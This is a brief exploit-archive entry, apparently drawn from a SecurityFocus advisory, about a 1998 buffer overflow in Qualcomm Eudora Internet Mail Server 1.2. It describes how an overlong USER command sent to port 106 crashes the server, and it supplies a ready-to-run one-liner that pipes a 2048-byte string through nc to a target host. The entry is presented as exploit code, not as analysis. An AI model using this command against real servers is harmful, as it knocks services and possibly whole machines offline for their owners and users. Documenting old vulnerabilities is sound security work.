Qualcomm Eudora Internet Mail Server 1.2 Buffer Overflow Vulnerability

CIAC 14.04.1998 Verified
Remote Exploits Linux

Exploit Code

source: http://www.securityfocus.com/bid/75/info

There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.

$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106